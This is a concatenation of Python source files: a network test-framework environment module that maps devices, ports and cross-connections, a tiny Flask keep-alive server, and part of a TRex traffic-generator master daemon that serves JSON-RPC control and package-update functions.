# all the switch related plugins that expect a switch attribute
# fail gracefully
if not hasattr(self, "switch"):
setattr(self, "switch", {})
if not hasattr(self, ename):
setattr(self, ename, {})
eid = len(getattr(self, ename)) + 1
# Append ID maps
self.dut_map["%s%s" % (self.__dev[entry['entry_type']]['LINK_NAME'], eid)] = entry['id']
# Create entry instance
getattr(self, ename)[eid] = self.__dev[entry['entry_type']][entry['instance_type']](
entry, self.opts)
getattr(self, ename)[eid].env = self
self.id_map[entry['id']] = getattr(self, ename)[eid]
# In case entry contains autoname Environment object will contain d_<autoname>
# attribute.
if entry.get('autoname', False):
# Append autoname and Id
setattr(self, "d_{0}".format(entry['autoname']), getattr(self, ename)[eid])
self.autoname_map[entry['autoname']] = entry['id']
# Pass required by entries related objects:
for entry in self.config:
if "related_id" in entry:
self.id_map[entry['id']].related_obj = dict(
[(_id, self.id_map[_id]) for _id in entry['related_id']])
# To support heterogeneous setup we need to support multiple Cross connection types,
# but allow user to be independent from this.
# Cross object automatically detects connection owner and forward it to proper cross instance.
self.cross = Cross(self.setup, self)
# Append connections lists for cross entries.
if "cross" in self.setup:
for c_id in self.setup['cross']:
self.id_map[c_id].connections = self.setup['cross'][c_id]
# TODO: Add transparent support of multiple TG instances in one.
def _import_device_modules(self, device_module_names):
for mod_name in device_module_names:
self.class_logger.debug("Loading %s module...", mod_name)
try:
new_module = __import__("testlib." + mod_name, fromlist=[mod_name])
except ImportError:
self.class_logger.warning("failed to import %s", mod_name, exc_info=True)
# ignore modules that can't load, e.g. dependency problems such as tempest
# instead failed when we try to instantiate the class
continue
# insert into global namespace
globals()[mod_name] = new_module
if new_module.ENTRY_TYPE and new_module.ENTRY_TYPE not in self.__dev:
self.__dev[new_module.ENTRY_TYPE] = {
"NAME": new_module.NAME,
"LINK_NAME": getattr(new_module, 'LINK_NAME', new_module.NAME),
}
for instance_name, entry_class in new_module.INSTANCES.items():
if issubclass(entry_class, entry_template.GenericEntry):
self.class_logger.debug(
"Found entry_type {0}, instance_type {1}.".format(new_module.ENTRY_TYPE,
instance_name))
self.__dev[new_module.ENTRY_TYPE][instance_name] = entry_class
def create_conf_entry(self, setup_entry):
# Search for id in environment config
# Add environment entry in setup if it's found, or leave setup entry as is.
conf_entry = next(
(cfg_e for cfg_e in self.config if cfg_e['id'] == setup_entry['id']),
setup_entry)
# Updating env keys according to setup
conf_entry.update(setup_entry)
return conf_entry
def _find_dev_modules(self):
# extract this so we can override in unittests
devices = []
return devices
def _get_conf(self, file_name=None):
"""Load environment config from file.
Args:
file_name(str): Name of a json file with a test environment configuration.
Raises:
TAFCoreException: configuration file is not found
IOError: error on reading configuration file
Returns:
dict: dict of the selected configuration.
Notes:
This method shouldn't be used outside this class. Use "config" attribute to access environment configuration.
"""
if not file_name:
self.class_logger.info("Environment file isn't set. All configurations will be taken from setup file.")
# Return empty dict
return dict()
path_to_config = environment.get_conf_file(conf_name=file_name, conf_type="env")
if not path_to_config:
message = "Specified configuration file %s not found." % (file_name, )
raise TAFCoreException(message)
try:
config = json.loads(open(path_to_config).read(), encoding="latin-1")
except:
message = "Cannot read specified configuration: %s" % (path_to_config, )
self.class_logger.error(message)
raise IOError(message)
return config
def _get_setup(self, file_name):
"""Reads setup file based on provided name.
Args:
file_name(str): Name of a json file with setup.
Raises:
TAFCoreException: setup file is not found
IOError: error on reading setup file
Returns:
list[dict]: setup json content.
"""
if not file_name:
message = "Setup name must be specified."
raise TAFCoreException(message)
path_to_config = environment.get_conf_file(conf_name=file_name, conf_type="setup")
if not path_to_config:
message = "Cannot find given setup %s" % (file_name, )
raise TAFCoreException(message)
try:
setup = json.loads(open(path_to_config).read(), encoding='ascii')
except:
message = "Cannot read specified setup configuration: %s" % (path_to_config, )
self.class_logger.error(message)
raise IOError(message)
return setup
def _get_device_conf(self, device_id):
"""Return config entry by given Id if one, else return None.
Args:
device_id(str): Entry ID.
Returns:
dict: Entry config.
"""
return next((entry for entry in self.config if entry['id'] == device_id), None)
def id2instance(self, device_id):
"""Returns entry instance by device id.
Args:
device_id(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.
Returns:
GenericEntry: Entry instance
Examples::
# by LINK_NAME
env.id2instance("sw1")
# by "autoname"
env.get_device_id("DEV2")
# by ID
env.get_device_id("9")
"""
dev_id = self.get_device_id(device_id)
entry = [e for e in self.config if e['id'] == dev_id][0]
instance = None
for _i in list(getattr(self, self.__dev[entry['entry_type']]['NAME']).values()):
if _i.id == dev_id:
instance = _i
break
return instance
def _append_related_confs(self, conf_ids):
"""Create dictionary with related device configurations.
Args:
conf_ids(list[str]): List of related config IDs.
Raises:
Exception: configuration is not found for specific device ID
Returns:
dict: Dictionary with related device configurations
"""
related_confs = {}
for device_id in conf_ids:
conf = self._get_device_conf(device_id)
if conf:
related_confs[device_id] = conf
else:
raise Exception("Configuration for device with id: %s not found." % device_id)
return related_confs
def safe_executor(self, obj, method, *args, **kwargs):
"""Invokes obj.method(*args, **kwargs) in try block and return error message with traceback.
Args:
obj(GenericEntry): Entry instance
method(str): method name that has to be executed
Returns:
str: Error message with traceback
Warning:
- Don't use in case obj.method has to return something.
- Don't use in case an exception has to be handled by py.test.
"""
try:
self.class_logger.debug("Perform %s(*%s, **%s) on entry_type=%s, id=%s" %
(method, args, kwargs, obj.type, obj.id))
getattr(obj, method)(*args, **kwargs)
except Exception:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback_message = traceback.format_exception(exc_type, exc_value, exc_traceback)
message = ("Error while call %s of entry_type=%s id=%s:\n%s" %
(method, obj.type, obj.id, "".join(traceback_message)))
self.class_logger.error(message)
return message
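    # Illustrative usage (not part of the original module): a teardown step
    # might collect errors without aborting, e.g.
    #   err = env.safe_executor(env.switch[1], "cleanup")
    #   if err:
    #       env.class_logger.warning(err)
    # where env.switch[1] is a placeholder device instance.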
def parallelize(self, objects, method, safe=False):
"""Run objects method in multiple threads.
Args:
objects(list[GenericEntry]): list of device objects.
method(str): method name that has to be executed.
safe(bool): Hide exception raisings, but print log message.
Returns:
None
Examples::
objects = [env.lhost[1], env.lhost[2]]
env.parallelize(objects, "cleanup", False)
"""
threads = []
def executor(o, m):
return getattr(o, m)()
for obj in objects:
func = self.safe_executor if safe else executor
thread = Thread(target=func, args=(obj, method))
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def ordered_action(self, action, prio, entry_types):
"""Perform action on entries with type in entry_types and ordered by prio.
Args:
action(str): method name to execute.
prio(str): priority name to sort objects by.
entry_types(list[str]): entry types to apply action (apply action to all entry types if None).
Returns:
None
"""
# Select all types in case list isn't set.
if not entry_types:
entry_types = list(self.__dev.keys())
# Sort by start priorities
prio_dict = self._get_prio_dict(prio)
s_list = sorted(prio_dict.keys())
# Leave only selected entry types in prio_dict
for prio in prio_dict:
for item in prio_dict[prio][:]:
if self._get_device_conf(item.id)['entry_type'] not in entry_types:
prio_dict[prio].remove(item)
for _s in s_list:
if len(prio_dict[_s]) > 1 and self.opts.use_parallel_init:
self.parallelize(prio_dict[_s], action)
else:
for obj in prio_dict[_s]:
self.class_logger.debug("Perform %s() on entry_type=%s, id=%s" %
(action, obj.type, obj.id))
getattr(obj, action)()
def _get_prio_dict(self, prio):
"""Return dict of entries by prio.
Args:
            prio(str): Priority name to order the dict by.
Returns:
dict: dict of lists where key = priority, value = list of device objects.
"""
prio_dict = {}
for _e in self.config:
# Set default prio value (0) in case it's not set.
_prio = _e[prio] if prio in _e else 0
            # Create/append list of device objects with the same priority.
if _prio not in prio_dict:
prio_dict[_prio] = []
prio_dict[_prio].append(self.id_map[_e['id']])
return prio_dict
def initialize(self, entry_types=None):
"""Initialize test environment.
Args:
entry_types(list[str]): List of entry types
"""
self.class_logger.info("Initialize environment...")
self.ordered_action("create", "sprio", entry_types)
def cleanup(self, entry_types=None):
"""Cleaning environment.
Args:
entry_types(list[str]): List of entry types
"""
self.class_logger.info("Cleanup environment...")
self.ordered_action("cleanup", "cprio", entry_types)
def sanitize(self, entry_types=None):
"""Sanitizing environment.
Args:
entry_types(list[str]): List of entry types
"""
self.class_logger.info("Sanitizing environment...")
self.ordered_action("sanitize", "kprio", entry_types)
def check(self, entry_types=None):
"""Checking environment.
Args:
entry_types(list[str]): List of entry types
"""
self.class_logger.info("Check environment...")
self.ordered_action("check", "tprio", entry_types)
def shutdown(self, entry_types=None):
"""Stopping/Disconnecting environment.
Args:
entry_types(list[str]): List of entry types
Note:
            This method takes care to release the whole environment even if an exception is raised during the destroy process.
"""
# Keep all error messages and print them at the end.
        # This list won't be appended to in case of parallelized execution.
error_messages = []
# Sort by start priorities
prio_dict = self._get_prio_dict("kprio")
s_list = sorted(prio_dict.keys())
# In further method calling we set safe flag or use safe_executor
# to log and pass exceptions on destroy.
for _s in s_list:
if len(prio_dict[_s]) > 1 and self.opts.use_parallel_init:
self.parallelize(prio_dict[_s], "destroy", True)
else:
for obj in prio_dict[_s]:
err_msg = self.safe_executor(obj, "destroy")
if err_msg:
error_messages.append(err_msg)
if error_messages:
message = "The following errors encountered on environment shutdown:\n%s" % ("".join(error_messages), )
self.class_logger.error(message)
# if stdout logging is disabled print error messages anyway
if not loggers.LOG_STREAM:
sys.stderr.write("ERROR:\n%s" % (message, ))
sys.stderr.flush()
def get_device_id(self, dut):
"""Search device in config object by device name.
Args:
dut(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.
Raises:
TAFCoreException: unknown device type
Returns:
str, int: Device id which configured.
Examples (Config object like)::
{
"env": [
{"id": 5, "port_list": [["port1", 10000], ["port2", 40000]},
{"id": 9, "autoname": "DEV2", "port_list": [["port1", 10000], ["port2", 40000]}
]
"cross": {"ID": [[5, 1, 9, 2], [5, 2, 9, 1]]}
}
Result is::
# by LINK_NAME
env.get_device_id("sw1") == 5
# by "autoname"
env.get_device_id("DEV2") == 9
# by ID
env.get_device_id(9) == 9
"""
# Find dut in dut_map if it is ID device
if dut in list(self.dut_map.values()):
return dut
# Find dut acronym in dut_map
elif dut in self.dut_map:
# If acronym in dut_map
dev_id = self.dut_map[dut]
return dev_id
# Find dut acronym in autoname_map
elif dut in self.autoname_map:
# If acronym in autoname_map
dev_id = self.autoname_map[dut]
return dev_id
# Raise an exception if invalid device type
else:
message = "This device type not found. This method supports only %s or %s device types." % (list(self.dut_map.keys()), list(self.autoname_map.keys()))
raise TAFCoreException(message)
def get_real_port_name(self, dut, port_id):
"""Search real port number/name by device name and port Id in config object.
Args:
dut(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.
port_id(int): Port Id from config object (ids starts from 1).
Raises:
TAFCoreException: port_id is not found in configuration; device doesn't have ports or port_list attributes
Returns:
int, str: Real port number/name or exception if there is no port with given Id in config.
Examples (Config object like)::
{
"env": [
{"id": 99, "autoname": "DEV1", "port_list": [["port1", 10000], ["port2", 10000]},
{"id": 100, "ports": ["port10", 11]}
]
"cross": {"ID": [[99, 1, 100, 2], [99, 2, 100, 1]]}
}
Result is::
            # by LINK_NAME
env.get_real_port_name("sw2", 2) == 11
# by "autoname"
env.get_real_port_name("DEV1", 1) == "port1"
"""
# find device ID by acronym
dev_id = self.get_device_id(dut)
# find device object
dev_obj = self.id_map[dev_id]
# find port_id in port_list
# WARNING: We HAVE to check ports and port_list in objects instead of configs,
# because some device classes modify port names.
# E.g.: json doesn't support tuples, but ports have to be hashable type.
if hasattr(dev_obj, "port_list") and dev_obj.port_list:
try:
return dev_obj.port_list[port_id - 1][0]
except IndexError:
message = "Port ID %s is not found in 'port_list' of %s(%s)." % (port_id, dev_id, dut)
raise TAFCoreException(message)
# find port_id in ports
elif hasattr(dev_obj, "ports") and dev_obj.ports:
try:
return dev_obj.ports[port_id - 1]
except IndexError:
message = "Port ID %s is not found in 'ports' of %s(%s)." % (port_id, dev_id, dut)
raise TAFCoreException(message)
else:
message = "Device %s(%s) doesn't have 'ports' or 'port_list' attributes." % (dev_id, dut)
raise TAFCoreException(message)
def get_port_speed(self, dut, port_id):
"""Search speed port in config object namely in 'port_list' by device name and port Id.
Args:
dut(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.
port_id(int): Port Id from config object (ids starts from 1)
Raises:
TAFCoreException: port is not present in configuration's 'port_list'
Returns:
int: Port speed or exception if there is no port with given Id in config.
Examples (Config object like)::
{
"env": [
{"id": 5, "autoname": "DEV1", "port_list": [["port1", 10000], ["port2", 40000]},
{"id": 9, "ports": ["port10", 11]}
]
"cross": {"ID": [[5, 1, 9, 2], [5, 2, 9, 1]]}
}
Result is::
env.get_port_speed("sw1", 2) == 40000
env.get_port_speed("DEV1", 1) == 10000
"""
# find device id by acronym
dev_id = self.get_device_id(dut)
# find device id in config
for dev_config in self.config:
if dev_config['id'] == dev_id:
# find port_id and speed in port_list
if 'port_list' in dev_config:
try:
return dev_config['port_list'][port_id - 1][1]
# raise exception if no speed for port
except IndexError:
message = "Port id %s is not configured on device %s." % (port_id, dut)
raise TAFCoreException(message)
# raise exception if not configured port_list
else:
message = "List of ports speed is not configured on device %s." % dut
raise TAFCoreException(message)
def get_ports(self, links=None):
"""Returns dictionary of ports based on links between devices.
Args:
links(list[list]): List of devices in format [['dev1', 'dev2', number_of_links, port_speed], ] (list of lists).
Where: \a number_of_links - optional parameter(int or enum - "ALL"); \a port_speed - optional parameter.
Raises:
TAFCoreException: wrong link format
Returns:
dict: ports
Examples (Config object like)::
{
"env": [
{"id": 99, "autoname": "DEV1", "port_list": [["port1", 10000], ["port2", 40000], ["port3", 10000]},
{"id": 100, "port_list": [["port10", 40000], [11, 10000], ["port12", 40000]}
]
"cross": {"ID": [[99, 1, 100, 2], [99, 2, 100, 1]]}
}
Result is::
ports = env.get_ports([['sw1', 'sw2', 1], ])
assert ports == {('sw2', 'sw1'): {1: "port10"}, ('sw1', 'sw2'): {1: "port1"}}
ports = env.get_ports([['DEV1', 'sw2', 2], ])
assert ports == {('sw2', 'sw1'): {1: "port10", 2: 11}, ('sw1', 'sw2'): {1: "port1", 2: "port2"}}
# with optional parameter "port_speed"
ports = env.get_ports([['sw1', 'sw2', 1, 10000], ])
            assert ports == {('sw1', 'sw2'): {1: "port1"}, ('sw2', 'sw1'): {1: 11}}
            # Method returns all links between devices if no optional parameters are given
ports = env.get_ports([['sw1', 'sw2', ], ])
assert ports == {('sw1', 'sw2'): {1: "port1", 2: "port2"}, ('sw2', 'sw1'): {1: "port10", 2: 11}}
# The same with enum "ALL"
ports = env.get_ports([['sw1', 'sw2', "ALL"], ])
assert ports == {('sw1', 'sw2'): {1: "port1", 2: "port2"}, ('sw2', 'sw1'): {1: "port10", 2: 11}}
# With optional parameters "port_speed" and "ALL"
ports = env.get_ports([['sw1', 'sw2', "ALL", 40000], ])
assert ports == {('sw1', 'sw2'): {1: "port2"}, ('sw2', 'sw1'): {1: "port10"}}
# Method returns all links between devices if no parameter
ports = env.get_ports()
assert ports == {('sw1', 'sw2'): {1: "port1", 2: "port2"}, ('sw2', 'sw1'): {1: "port10", 2: 11}}
"""
if links:
# Create empty prototype for ports dictionary
ports = {}
for link in links:
# if not specified all devices
if len(link) < 2:
message = "At list is not specified devices."
raise TAFCoreException(message)
ports[(link[0], link[1])] = {}
ports[(link[1], link[0])] = {}
# Process each link in links
for link in links:
# link Ids counter
link_id = 0
# if not specified number of links return all links between devices
if len(link) == 2:
link.append("ALL")
# if number of links specified zero then raise exception
if link[2] == 0:
message = "Number of links cannot equal zero."
raise TAFCoreException(message)
# the flag indicates that was set parameter port_speed
port_speed_flag = False
if len(link) == 4:
port_speed_flag = True
port_speed = link[3]
# ports Ids counter
ports_count = link[2]
if link[2] == "ALL":
ports_count = 1
# Process setups for each cross
for cross_id in self.setup['cross']:
# Each link in setup
for setup_link in self.setup['cross'][cross_id]:
# This list will contain port Ids from setup
port_ids = []
try:
# Search for link in setup. Compare links by devices ID
if [setup_link[0], setup_link[2]] == [self.get_device_id(link[0]), self.get_device_id(link[1])]:
port_ids = [setup_link[1], setup_link[3]]
elif [setup_link[2], setup_link[0]] == [self.get_device_id(link[0]), self.get_device_id(link[1])]:
port_ids = [setup_link[3], setup_link[1]]
except TAFCoreException as err:
message = "Insufficient devices count required for test"
pytest.skip(message)
# Append ports
if port_ids:
if port_speed_flag:
if link_id < ports_count:
if self.get_port_speed(link[0], port_ids[0]) == self.get_port_speed(link[1], port_ids[1]) == port_speed:
link_id += 1
ports[(link[0], link[1])][link_id] = self.get_real_port_name(link[0], port_ids[0])
ports[(link[1], link[0])][link_id] = self.get_real_port_name(link[1], port_ids[1])
else:
if link_id < ports_count:
link_id += 1
ports[(link[0], link[1])][link_id] = self.get_real_port_name(link[0], port_ids[0])
ports[(link[1], link[0])][link_id] = self.get_real_port_name(link[1], port_ids[1])
if link[2] == "ALL":
ports_count += 1
# If all links are collected
if link_id == ports_count:
break
if link[2] == "ALL":
ports_count = link_id
                # Verify that the ports dictionary is fully filled
if (len(ports[(link[0], link[1])]) < ports_count or
len(ports[(link[1], link[0])]) < ports_count or
not ports[(link[0], link[1])] or
not ports[(link[1], link[0])]):
if port_speed_flag:
message = "No links with required speed {0}".format(port_speed)
else:
message = "Insufficient links count required for test"
pytest.skip(message)
self.class_logger.debug("Got the following ports: %s." % (ports, ))
return ports
else:
ports = {}
# create tuples of existing device connection pairs
for cross_id in self.setup['cross']:
for setup_link in self.setup['cross'][cross_id]:
ports[setup_link[0], setup_link[2]] = {}
ports[setup_link[2], setup_link[0]] = {}
# Process each tuple in ports
for key in ports:
# link Ids counter
link_id = 0
# Process setups for each cross
for cross_id in self.setup['cross']:
# Each link in setup
for setup_link in self.setup['cross'][cross_id]:
# Search for link in setup. Compare links by devices ID
if [setup_link[0], setup_link[2]] == [self.get_device_id(key[0]), self.get_device_id(key[1])]:
link_id += 1
# Append ports
ports[(key[0], key[1])][link_id] = self.get_real_port_name(key[0], setup_link[1])
elif [setup_link[2], setup_link[0]] == [self.get_device_id(key[0]), self.get_device_id(key[1])]:
link_id += 1
ports[(key[0], key[1])][link_id] = self.get_real_port_name(key[0], setup_link[3])
self.class_logger.debug("Got the following ports: %s." % (ports, ))
return ports
class Cross(dict):
"""New interface to cross object without device id.
"""
def __init__(self, setup, env):
"""Initialize Cross class.
"""
super(Cross, self).__init__()
self.setup = setup
self.env = env
if hasattr(env, "cross"):
for key, value in list(env.cross.items()):
self[key] = value
def get_device_id(self, connection):
"""Search device in setup object by given connection.
Args:
connection(list): Connection info in format [sw1, port1, sw2, port2]
Raises:
Exception: no device in connection
Returns:
int: device id which own connection
"""
connection_reverse = connection[2:] + connection[:2]
try:
match = next(cross_id for cross_id, crosses in self.setup['cross'].items()
if connection in crosses or connection_reverse in crosses)
# keys() is not guaranteed to be stable, why does this work?
return list(self.setup['cross'].keys()).index(match) + 1
except StopIteration:
raise Exception("Can not find device with such connection: %s in config" % connection)
def xconnect(self, connection):
"""Wrapper for xconnect method defined in xconnect.py module.
Args:
connection(list): Connection info in format [sw1, port1, sw2, port2]
"""
id_real_device = self.get_device_id(connection)
return self[id_real_device].xconnect(connection)
def xdisconnect(self, connection):
"""Wrapper for xdisconnect method defined in xconnect.py module.
Args:
connection(list): in format [sw1, port1, sw2, port2]
"""
id_real_device = self.get_device_id(connection)
return self[id_real_device].xdisconnect(connection)
def cross_connect(self, conn_list):
"""Wrapper for cross_connect method defined in xconnect.py module.
Args:
conn_list(list[list]): List of connections
Raises:
Exception: conn_list is empty
"""
if conn_list:
connection = conn_list[0]
id_real_device = self.get_device_id(connection)
return self[id_real_device].cross_connect([connection])
else:
raise Exception("conn_list is empty")
def cross_disconnect(self, disconn_list):
"""Wrapper for cross_disconnect method defined in xconnect.py module.
Args:
disconn_list(list[list]): List of connections
Raises:
Exception: disconn_list is empty
"""
if disconn_list:
connection = disconn_list[0]
id_real_device = self.get_device_id(connection)
return self[id_real_device].cross_disconnect(disconn_list)
else:
raise Exception("disconn_list is empty")
def get_connection(self, dev_id, port_no):
"""Get connection for device port.
Args:
dev_id(str): Device ID/autoname/linkname ('tg1')
port_no(int): Device port number.
Raises:
Exception: no connection for current port
Returns:
list: Connection info
"""
# Get device
device_id = self.env.get_device_id(dev_id)
dev_obj = self.env.id_map[device_id]
# Get port_id from port_no
port_id = dev_obj.ports.index(port_no)
# Check for connection in setup
connection = None
for device in self.setup['cross']:
for conn in self.setup['cross'][device]:
if (device_id == conn[0] and port_id == conn[1] - 1) or (device_id == conn[2] and port_id == conn[3] - 1):
connection = conn
break
if connection is None:
raise Exception("Port {0} on device {1} is not used in current setup.".format(port_no, dev_id))
# dev_id has to be source
if connection[0] != device_id:
connection = connection[2:] + connection[:2]
return connection
def device_port_disconnect(self, dev_id, port_no):
"""Connect/Disconnect device port.
Args:
dev_id(str): Device ID/autoname/linkname ('tg1')
port_no(int): Device port number.
"""
# Get connection
connection = self.get_connection(dev_id, port_no)
# Emulate port disconnection
self.cross_disconnect([connection, ])
def device_port_connect(self, dev_id, port_no):
"""Connect/Disconnect device port.
Args:
dev_id(str): Device ID/autoname/linkname ('tg1')
port_no(int): Device port number.
"""
# Get connection
connection = self.get_connection(dev_id, port_no)
# Emulate port connection
self.cross_connect([connection, ])
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Creator Steus#0001"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
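# Illustrative usage (not part of the original file): a bot script would
# typically call keep_alive() once before starting its blocking main loop,
# e.g.
#   keep_alive()
#   bot.run(TOKEN)   # 'bot' and 'TOKEN' are placeholders defined elsewhere
# so that the Flask thread keeps the hosting container from idling out.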
|
master_daemon.py
|
#! /bin/bash
"source" "find_python.sh" "--local"
"exec" "$PYTHON" "$0" "$@"
import os
import sys
import shutil
import threading
import logging
import time
from collections import OrderedDict
from argparse import *
from glob import glob
import signal
from functools import partial
sys.path.append(os.path.join('automation', 'trex_control_plane', 'server'))
import CCustomLogger
import outer_packages
from tcp_daemon import TCPDaemon, run_command
from jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer
import termstyle
### Server functions ###
def check_connectivity():
return True
def add(a, b): # for sanity checks
return a + b
def get_trex_path():
return args.trex_dir
def get_package_path():
return CUpdate.info.get('path')
def get_package_sha1():
return CUpdate.info.get('sha1')
def is_updating():
return CUpdate.thread and CUpdate.thread.is_alive()
def _update_trex_process(package_path):
file_name = 'trex_package.tar.gz'
# getting new package
if package_path.startswith('http'):
ret_code, stdout, stderr = run_command('wget %s -O %s' % (package_path, os.path.join(tmp_dir, file_name)), timeout = 600)
else:
ret_code, stdout, stderr = run_command('rsync -Lc %s %s' % (package_path, os.path.join(tmp_dir, file_name)), timeout = 300)
if ret_code:
raise Exception('Could not get requested package. Result: %s' % [ret_code, stdout, stderr])
# calculating hash
ret_code, stdout, stderr = run_command('sha1sum -b %s' % os.path.join(tmp_dir, file_name), timeout = 30)
if ret_code:
raise Exception('Could not calculate hash of package. Result: %s' % [ret_code, stdout, stderr])
package_sha1 = stdout.strip().split()[0]
# clean old unpacked dirs
tmp_files = glob(os.path.join(tmp_dir, '*'))
for tmp_file in tmp_files:
if os.path.isdir(tmp_file) and not os.path.islink(tmp_file):
shutil.rmtree(tmp_file)
# unpacking
ret_code, stdout, stderr = run_command('tar -xzf %s' % os.path.join(tmp_dir, file_name), timeout = 120, cwd = tmp_dir)
if ret_code:
raise Exception('Could not untar the package. %s' % [ret_code, stdout, stderr])
tmp_files = glob(os.path.join(tmp_dir, '*'))
unpacked_dirs = []
for tmp_file in tmp_files:
if os.path.isdir(tmp_file) and not os.path.islink(tmp_file):
unpacked_dirs.append(tmp_file)
if len(unpacked_dirs) != 1:
raise Exception('Should be exactly one unpacked directory, got: %s' % unpacked_dirs)
os.chmod(unpacked_dirs[0], 0o777) # allow core dumps to be written
cur_dir = args.trex_dir
if os.path.islink(cur_dir) or os.path.isfile(cur_dir):
os.unlink(cur_dir)
if not os.path.exists(cur_dir):
os.makedirs(cur_dir)
os.chmod(cur_dir, 0o777)
bu_dir = '%s_BU%i' % (cur_dir, int(time.time()))
try:
        # back up current dir
shutil.move(cur_dir, bu_dir)
shutil.move(unpacked_dirs[0], cur_dir)
CUpdate.info = {'path': package_path, 'sha1': package_sha1}
logging.info('Done updating, success')
except BaseException as e: # something went wrong, return backup dir
logging.error('Error while updating: %s' % e)
if os.path.exists(cur_dir):
shutil.rmtree(cur_dir)
shutil.move(bu_dir, cur_dir)
raise
finally:
if os.path.exists(bu_dir):
shutil.rmtree(bu_dir)
# non blocking update
def update_trex(package_path = 'http://trex-tgn.cisco.com/trex/release/latest'):
if not args.allow_update:
raise Exception('Updating server not allowed')
if CUpdate.thread and CUpdate.thread.is_alive():
CUpdate.thread.terminate()
CUpdate.thread = threading.Thread(target = _update_trex_process, args = [package_path])
CUpdate.thread.daemon = True
CUpdate.thread.start()
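# Illustrative client-side call (not part of the original file; it assumes the
# jsonrpclib client API, and the host, port and package URL are placeholders):
# a remote caller could trigger a non-blocking update and poll its progress
# with something like
#   import jsonrpclib
#   proxy = jsonrpclib.Server('http://<server>:8091')
#   proxy.update_trex('http://trex-tgn.cisco.com/trex/release/latest')
#   while proxy.is_updating():
#       time.sleep(1)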
def save_coredump():
latest_core_file = {
'time': 0,
'path': None}
for core_file in glob(os.path.join(args.trex_dir, 'core*')):
mod_time = os.path.getmtime(core_file)
if latest_core_file['time'] < mod_time:
latest_core_file['time'] = mod_time
latest_core_file['path'] = core_file
if latest_core_file['path']:
shutil.copy(latest_core_file['path'], os.path.join(tmp_dir, 'coredump'))
### /Server functions ###
def fail(msg):
print(msg)
sys.exit(-1)
def set_logger():
log_dir = os.path.dirname(logging_file)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
if os.path.exists(logging_file):
if os.path.exists(logging_file_bu):
os.unlink(logging_file_bu)
os.rename(logging_file, logging_file_bu)
CCustomLogger.setup_daemon_logger('Master daemon', logging_file)
def log_usage(name, func, *args, **kwargs):
log_string = name
if args:
log_string += ', args: ' + repr(args)
if kwargs:
log_string += ', kwargs: ' + repr(kwargs)
logging.info(log_string)
return func(*args, **kwargs)
def start_master_daemon():
funcs_by_name = {}
# master_daemon functions
funcs_by_name['add'] = add
funcs_by_name['check_connectivity'] = check_connectivity
funcs_by_name['get_trex_path'] = get_trex_path
funcs_by_name['get_package_path'] = get_package_path
funcs_by_name['get_package_sha1'] = get_package_sha1
funcs_by_name['is_updating'] = is_updating
funcs_by_name['update_trex'] = update_trex
funcs_by_name['save_coredump'] = save_coredump
# trex_daemon_server
funcs_by_name['is_trex_daemon_running'] = trex_daemon_server.is_running
funcs_by_name['restart_trex_daemon'] = trex_daemon_server.restart
funcs_by_name['start_trex_daemon'] = trex_daemon_server.start
funcs_by_name['stop_trex_daemon'] = trex_daemon_server.stop
# stl rpc proxy
funcs_by_name['is_stl_rpc_proxy_running'] = stl_rpc_proxy.is_running
funcs_by_name['restart_stl_rpc_proxy'] = stl_rpc_proxy.restart
funcs_by_name['start_stl_rpc_proxy'] = stl_rpc_proxy.start
funcs_by_name['stop_stl_rpc_proxy'] = stl_rpc_proxy.stop
try:
set_logger()
server = SimpleJSONRPCServer(('0.0.0.0', master_daemon.port))
logging.info('Started master daemon (port %s)' % master_daemon.port)
for name, func in funcs_by_name.items():
server.register_function(partial(log_usage, name, func), name)
server.register_function(server.funcs.keys, 'get_methods') # should be last
signal.signal(signal.SIGTSTP, stop_handler) # ctrl+z
signal.signal(signal.SIGTERM, stop_handler) # kill
server.serve_forever()
except KeyboardInterrupt:
logging.info('Ctrl+C')
except Exception as e:
logging.error('Closing due to error: %s' % e)
finally:
if CUpdate.thread and CUpdate.thread.is_alive():
CUpdate.thread.terminate()
def stop_handler(signalnum, *args, **kwargs):
if CUpdate.thread and CUpdate.thread.pid == os.getpid():
logging.info('Updating aborted.')
else:
logging.info('Got signal %s, exiting.' % signalnum)
sys.exit(0)
# returns True if given path is under current dir or /tmp
def _check_path_under_current_or_temp(path):
if not os.path.relpath(path, '/tmp').startswith(os.pardir):
return True
if not os.path.relpath(path, os.getcwd()).startswith(os.pardir):
return True
return False
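# Illustrative behaviour (not part of the original file): with the daemon
# started from /opt/trex, the check accepts paths under /tmp or the current
# directory and rejects everything else, e.g.
#   _check_path_under_current_or_temp('/tmp/trex-tmp')  -> True
#   _check_path_under_current_or_temp('/opt/trex/v2.x') -> True
#   _check_path_under_current_or_temp('/etc/trex')      -> False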
### Main ###
if os.getuid() != 0:
fail('Please run this program as root/with sudo')
pid = os.getpid()
ret, out, err = run_command('taskset -pc 0 %s' % pid)
if ret:
fail('Could not set self affinity to core zero. Result: %s' % [ret, out, err])
daemon_actions = OrderedDict([('start', 'start the daemon'),
('stop', 'exit the daemon process'),
                              ('show', 'show the status of the daemon process (running / not running)'),
('restart', 'stop, then start again the daemon process')])
actions_help = 'Specify action command to be applied on master daemon.\n' +\
'\n'.join([' (*) %-11s: %s' % (key, val) for key, val in daemon_actions.items()])
daemons = {}.fromkeys(['master_daemon', 'trex_daemon_server', 'stl_rpc_proxy'])
# show -p --master_port METAVAR instead of -p METAVAR --master_port METAVAR
class MyFormatter(RawTextHelpFormatter):
def _format_action_invocation(self, action):
if not action.option_strings or action.nargs == 0:
return super(MyFormatter, self)._format_action_invocation(action)
default = action.dest.upper()
args_string = self._format_args(action, default)
return ', '.join(action.option_strings) + ' ' + args_string
parser = ArgumentParser(description = 'Runs master daemon that can start/stop TRex daemon or update TRex version.',
formatter_class = MyFormatter)
parser.add_argument('-p', '--master-port', type=int, default = 8091, dest='master_port',
help = 'Select port to which the Master daemon will listen.\nDefault is 8091.', action = 'store')
parser.add_argument('--trex-daemon-port', type=int, default = 8090, dest='trex_daemon_port',
help = 'Select port to which the TRex daemon server will listen.\nDefault is 8090.', action = 'store')
